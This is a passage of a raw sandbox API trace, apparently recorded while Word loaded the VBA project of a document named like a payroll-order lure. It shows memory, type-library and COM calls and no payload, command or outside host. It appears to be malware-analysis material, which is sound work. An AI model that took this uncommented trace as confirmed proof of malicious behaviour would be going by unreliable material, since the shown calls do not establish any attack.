lpMultiByteStr=0x2072b0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0045.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.181] IMalloc:Realloc (This=0x7feff045380, pv=0x8188280, cb=0x8) returned 0x81883a0 [0045.181] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c3b0 [0045.181] IMalloc:GetSize (This=0x7feff045380, pv=0x811c3b0) returned 0x80 [0045.181] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff550 [0045.181] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff490 [0045.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x207170, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0045.181] CoCreateGuid (in: pguid=0x206ea0 | out: pguid=0x206ea0*(Data1=0x26f6acec, Data2=0xbf8e, Data3=0x4d09, Data4=([0]=0x9e, [1]=0x62, [2]=0x1a, [3]=0x19, [4]=0x8a, [5]=0xf6, [6]=0xed, [7]=0x88))) returned 0x0 [0045.181] CoCreateGuid (in: pguid=0x206eb0 | out: pguid=0x206eb0*(Data1=0x1e82b92e, Data2=0xf8b, Data3=0x4ad1, Data4=([0]=0x83, [1]=0x6c, [2]=0xaf, [3]=0x97, [4]=0x3, [5]=0xec, [6]=0x86, [7]=0x9))) returned 0x0 [0045.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x206ec0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0045.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.181] GetLocalTime (in: lpSystemTime=0x206d98 | out: lpSystemTime=0x206d98*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x3bb)) [0045.181] _ultow_s (in: _Value=0x5e399ea6, _Buffer=0x81f4f34, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e399ea6") returned 0x0 [0045.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="045e399ea6", cchWideChar=11, lpMultiByteStr=0x206d30, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="045e399ea6", lpUsedDefaultChar=0x0) returned 11 [0045.181] IMalloc:Alloc (This=0x7feff045380, cb=0x170) returned 0x819fce0 [0045.181] IMalloc:Alloc (This=0x7feff045380, cb=0x50) returned 0x7f18130 [0045.181] strcpy_s (in: _Dst=0x7fd6820, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0045.181] IMalloc:Realloc (This=0x7feff045380, pv=0x8075240, cb=0x68) returned 0x8070190 [0045.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.181] wcscpy_s (in: _Destination=0x81f4f48, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0045.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.181] wcscpy_s (in: _Destination=0x81f4f68, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0045.181] IMalloc:Realloc (This=0x7feff045380, pv=0x8188260, cb=0x12) returned 0x8177710 [0045.181] IMalloc:Realloc (This=0x7feff045380, pv=0x8075300, cb=0x6) returned 0x8188260 [0045.181] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x30) returned 0x7d55650 [0045.182] IMalloc:Free (This=0x7feff045380, pv=0x7f180d0) [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfee20 [0045.182] IMalloc:Realloc (This=0x7feff045380, pv=0x7dfee20, cb=0x5c) returned 0x8070200 [0045.182] IMalloc:Free (This=0x7feff045380, pv=0x7d55650) [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x3d0) returned 0x81f5850 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfee20 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x8177630 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c440 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8075300 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8075240 [0045.182] wcsncpy_s (in: _Destination=0x206bf0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0045.182] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0045.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206b20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0045.182] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x688) returned 0x81ead20 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c4d0 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x640) returned 0x81f5c30 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfedc0 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188280 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x81883b0 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfebe0 [0045.182] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c560 [0045.182] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0045.182] strcpy_s (in: _Dst=0x206dc0, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0045.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x206dc0, cbMultiByte=10, lpWideCharStr=0x206c10, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0045.182] IUnknown:AddRef (This=0x7edf740) returned 0x4 [0045.182] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x206ce0, pBstrLibName=0x206c10 | out: pfName=0x206ce0*=0, pBstrLibName=0x206c10) returned 0x0 [0045.183] IUnknown:Release (This=0x7edf740) returned 0x3 [0045.183] IUnknown:AddRef (This=0x3dd7b80) returned 0x6 [0045.183] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x206ce0, pBstrLibName=0x206c10 | out: pfName=0x206ce0*=0, pBstrLibName=0x206c10) returned 0x0 [0045.183] IUnknown:Release (This=0x3dd7b80) returned 0x5 [0045.183] IUnknown:AddRef (This=0x7ee0550) returned 0x5 [0045.183] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x206ce0, pBstrLibName=0x206c10 | out: pfName=0x206ce0*=0, pBstrLibName=0x206c10) returned 0x0 [0045.183] IUnknown:Release (This=0x7ee0550) returned 0x4 [0045.183] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207328 | out: ppvObject=0x207328*=0x0) returned 0x80004002 [0045.183] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2072d8 | out: ppvObject=0x2072d8*=0x0) returned 0x80004002 [0045.183] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f722f0, ppTypeAttr=0x2072b8, pDummy=0x10 | out: ppTypeAttr=0x2072b8, pDummy=0x10) returned 0x0 [0045.183] ITypeInfo:LocalReleaseTypeAttr (This=0x7f722f0) returned 0x0 [0045.183] ITypeInfo:GetImplTypeFlags (in: This=0x7f722f0, index=0x0, pImplTypeFlags=0x2072d4 | out: pImplTypeFlags=0x2072d4*=1) returned 0x0 [0045.183] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f722f0, index=0x0, pRefType=0x2072b0 | out: pRefType=0x2072b0*=0x6300) returned 0x0 [0045.183] ITypeInfo:GetRefTypeInfo (in: This=0x7f722f0, hreftype=0x6300, ppTInfo=0x2072a8 | out: ppTInfo=0x2072a8*=0x7f72348) returned 0x0 [0045.183] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72348, ppTypeAttr=0x2072b8, pDummy=0x207290 | out: ppTypeAttr=0x2072b8, pDummy=0x207290*=0x2072e0) returned 0x0 [0045.183] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72348) returned 0x0 [0045.183] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f72348, index=0xffffffff, pRefType=0x2072b0 | out: pRefType=0x2072b0*=0xfffffffe) returned 0x0 [0045.183] ITypeInfo:GetRefTypeInfo (in: This=0x7f72348, hreftype=0xfffffffe, ppTInfo=0x207320 | out: ppTInfo=0x207320*=0x7f723a0) returned 0x0 [0045.183] IUnknown:Release (This=0x7f72348) returned 0x1 [0045.183] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f722f0, ppTypeAttr=0x2072d8, pDummy=0x3 | out: ppTypeAttr=0x2072d8, pDummy=0x3) returned 0x0 [0045.183] ITypeInfo:LocalReleaseTypeAttr (This=0x7f722f0) returned 0x0 [0045.183] ITypeInfo:GetImplTypeFlags (in: This=0x7f722f0, index=0x0, pImplTypeFlags=0x2072cc | out: pImplTypeFlags=0x2072cc*=1) returned 0x0 [0045.184] ITypeInfo:GetImplTypeFlags (in: This=0x7f722f0, index=0x1, pImplTypeFlags=0x2072cc | out: pImplTypeFlags=0x2072cc*=2) returned 0x0 [0045.184] ITypeInfo:GetImplTypeFlags (in: This=0x7f722f0, index=0x2, pImplTypeFlags=0x2072cc | out: pImplTypeFlags=0x2072cc*=3) returned 0x0 [0045.184] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f722f0, index=0x2, pRefType=0x2072d0 | out: pRefType=0x2072d0*=0x10700) returned 0x0 [0045.184] ITypeInfo:GetRefTypeInfo (in: This=0x7f722f0, hreftype=0x10700, ppTInfo=0x207330 | out: ppTInfo=0x207330*=0x7f72450) returned 0x0 [0045.184] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee403e860*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2072d0 | out: ppvObject=0x2072d0*=0x81787d0) returned 0x0 [0045.184] IConnectionPointContainer:FindConnectionPoint (in: This=0x81787d0, riid=0x7fee4040ba8*(Data1=0x20410, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppCP=0x2072c8 | out: ppCP=0x2072c8*=0x7f180d0) returned 0x0 [0045.184] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfec70 [0045.184] IConnectionPoint:Advise (in: This=0x7f180d0, pUnkSink=0x7dfec70, pdwCookie=0x2072c4 | out: pdwCookie=0x2072c4*=0x4) returned 0x0 [0045.185] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfeee0 [0045.185] IMalloc:Realloc (This=0x7feff045380, pv=0x8075300, cb=0x20) returned 0x7dfef10 [0045.185] IMalloc:Realloc (This=0x7feff045380, pv=0x8188280, cb=0x28) returned 0x7dfee50 [0045.185] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070e0 | out: ppvObject=0x2070e0*=0x0) returned 0x80004002 [0045.185] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070b0 | out: ppvObject=0x2070b0*=0x0) returned 0x80004002 [0045.185] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070a0 | out: ppvObject=0x2070a0*=0x0) returned 0x80004002 [0045.185] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070a8 | out: ppvObject=0x2070a8*=0x0) returned 0x80004002 [0045.185] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x2070d8, pDummy=0x10 | out: ppTypeAttr=0x2070d8, pDummy=0x10) returned 0x0 [0045.185] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.185] IUnknown:AddRef (This=0x7f723a0) returned 0x2 [0045.185] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070f0 | out: ppvObject=0x2070f0*=0x0) returned 0x80004002 [0045.185] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070c0 | out: ppvObject=0x2070c0*=0x0) returned 0x80004002 [0045.185] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070b0 | out: ppvObject=0x2070b0*=0x0) returned 0x80004002 [0045.185] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070b8 | out: ppvObject=0x2070b8*=0x0) returned 0x80004002 [0045.185] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72450, ppTypeAttr=0x2070e8, pDummy=0x10 | out: ppTypeAttr=0x2070e8, pDummy=0x10) returned 0x0 [0045.185] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72450) returned 0x0 [0045.185] IUnknown:AddRef (This=0x7f72450) returned 0x2 [0045.185] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207130 | out: ppvObject=0x207130*=0x0) returned 0x80004002 [0045.185] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207100 | out: ppvObject=0x207100*=0x0) returned 0x80004002 [0045.185] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070f0 | out: ppvObject=0x2070f0*=0x0) returned 0x80004002 [0045.185] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2070f8 | out: ppvObject=0x2070f8*=0x0) returned 0x80004002 [0045.185] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f722f0, ppTypeAttr=0x207128, pDummy=0x10 | out: ppTypeAttr=0x207128, pDummy=0x10) returned 0x0 [0045.185] ITypeInfo:LocalReleaseTypeAttr (This=0x7f722f0) returned 0x0 [0045.185] IUnknown:AddRef (This=0x7f722f0) returned 0x2 [0045.185] IUnknown:Release (This=0x7f723a0) returned 0x1 [0045.185] IUnknown:Release (This=0x7f72450) returned 0x1 [0045.186] wcsncpy_s (in: _Destination=0x206e30, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0045.186] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0045.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206d60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0045.186] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0045.186] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.186] CExposedDocFile::CreateStream () returned 0x0 [0045.186] IMalloc:Alloc (This=0x7feff045380, cb=0x420) returned 0x81d9f40 [0045.186] CExposedStream::AddRef () returned 0x2 [0045.186] CExposedStream::Release () returned 0x1 [0045.186] CExposedStream::Release () returned 0x0 [0045.186] IMalloc:Free (This=0x7feff045380, pv=0x81d9f40) [0045.186] CExposedDocFile::AddRef () returned 0x3 [0045.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2076f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0045.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2076f0, cbMultiByte=-1, lpWideCharStr=0x7d55518, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0045.190] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x207798*=0x0 | out: pptlib=0x207798*=0x7edffb0) returned 0x0 [0045.190] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x207428*=0x0 | out: pptlib=0x207428*=0x7edffb0) returned 0x0 [0045.191] ITypeLib:RemoteGetDocumentation (in: This=0x7edffb0, index=-1, refPtrFlags=0x207448, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x207330, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0045.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0045.191] IUnknown:QueryInterface (in: This=0x7edffb0, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207308 | out: ppvObject=0x207308*=0x0) returned 0x80004002 [0045.191] GetLocalTime (in: lpSystemTime=0x2071b0 | out: lpSystemTime=0x2071b0*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x3cb)) [0045.191] wcsncpy_s (in: _Destination=0x206e60, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0045.191] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0045.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x206d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0045.191] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0045.191] GetLocalTime (in: lpSystemTime=0x207050 | out: lpSystemTime=0x207050*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x3cb)) [0045.191] wcsncpy_s (in: _Destination=0x206d00, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0045.191] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0045.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x206c30, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0045.191] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0 [0045.191] IUnknown:QueryInterface (in: This=0x7edffb0, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207238 | out: ppvObject=0x207238*=0x0) returned 0x80004002 [0045.191] ITypeLib:RemoteGetLibAttr (in: This=0x7edffb0, ppTLibAttr=0x207230, pDummy=0x10 | out: ppTLibAttr=0x207230, pDummy=0x10) returned 0x0 [0045.191] ITypeLib:RemoteGetDocumentation (in: This=0x7edffb0, index=-1, refPtrFlags=0x0, pbstrName=0x207228, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000 | out: pbstrName=0x207228*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000) returned 0x0 [0045.191] StringFromGUID2 (in: rguid=0x7e02c60*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x207250, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0045.191] _ultow_s (in: _Value=0x2, _Buffer=0x20719a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0045.191] _ultow_s (in: _Value=0x8, _Buffer=0x20719e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0045.191] _ultow_s (in: _Value=0x0, _Buffer=0x2071a2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0045.192] wcscpy_s (in: _Destination=0x810c1e8, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0045.192] wcscpy_s (in: _Destination=0x810c1ee, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0045.192] wcscpy_s (in: _Destination=0x810c23a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0045.192] wcscpy_s (in: _Destination=0x810c248, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0045.192] wcscpy_s (in: _Destination=0x810c2c8, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0045.192] ITypeLib:LocalReleaseTLibAttr (This=0x7edffb0) returned 0x0 [0045.192] wcscpy_s (in: _Destination=0x81f4f88, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0045.192] ITypeLib:RemoteGetDocumentation (in: This=0x7edffb0, index=-1, refPtrFlags=0x207348, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0045.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0045.192] strcpy_s (in: _Dst=0x207140, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0045.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x207140, cbMultiByte=7, lpWideCharStr=0x206f90, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0045.192] IUnknown:AddRef (This=0x7edf740) returned 0x4 [0045.192] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="Office", lHashVal=0x107515, pfName=0x207060, pBstrLibName=0x206f90 | out: pfName=0x207060*=0, pBstrLibName=0x206f90) returned 0x0 [0045.192] IUnknown:Release (This=0x7edf740) returned 0x3 [0045.192] IUnknown:AddRef (This=0x3dd7b80) returned 0x8 [0045.192] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="Office", lHashVal=0x107515, pfName=0x207060, pBstrLibName=0x206f90 | out: pfName=0x207060*=0, pBstrLibName=0x206f90) returned 0x0 [0045.192] IUnknown:Release (This=0x3dd7b80) returned 0x7 [0045.192] IUnknown:AddRef (This=0x7ee0550) returned 0x5 [0045.192] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="Office", lHashVal=0x107515, pfName=0x207060, pBstrLibName=0x206f90 | out: pfName=0x207060*=0, pBstrLibName=0x206f90) returned 0x0 [0045.192] IUnknown:Release (This=0x7ee0550) returned 0x4 [0045.192] IMalloc:Alloc (This=0x7feff045380, cb=0x3c) returned 0x7fc2040 [0045.192] IMalloc:Free (This=0x7feff045380, pv=0x8070200) [0045.192] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfea30 [0045.192] IMalloc:Realloc (This=0x7feff045380, pv=0x7dfea30, cb=0x68) returned 0x8070200 [0045.192] IMalloc:Free (This=0x7feff045380, pv=0x7fc2040) [0045.192] wcsncpy_s (in: 